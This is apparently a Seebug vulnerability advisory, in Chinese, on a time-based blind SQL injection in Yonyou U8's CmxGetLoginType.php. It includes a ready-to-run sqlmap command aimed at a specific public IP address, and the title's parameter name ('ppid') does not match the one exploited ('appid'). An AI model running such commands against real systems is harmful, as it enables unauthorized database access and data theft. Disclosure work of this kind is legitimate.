yonyou up U8系统 CmxGetLoginType.php 参数ppid SQL盲注漏洞

2016-02-14T00:00:00
ID SSV:90729
Type seebug
Reporter kikay
Modified 2016-02-14T00:00:00

Description

0x01漏洞简介

yonyou up U8系统在/Server/CmxGetLoginType.php对参数参数ppid过滤不严格,导致存在SQL注入漏洞。远程攻击者可以结合时间延迟注入方式,执行SQL指令,获取敏感信息。

0x02漏洞利用

这次存在漏洞的文件:

``` /Server/CmxGetLoginType.php?a=RAS_admin&appid=1

sqlmap.py -u "http://218.27.137.242:8080/Server/CmxGetLoginType.php?a=RAS_admin&appid=1" -p appid --technique T --dbms mysql ```

0x03修复方案

过滤。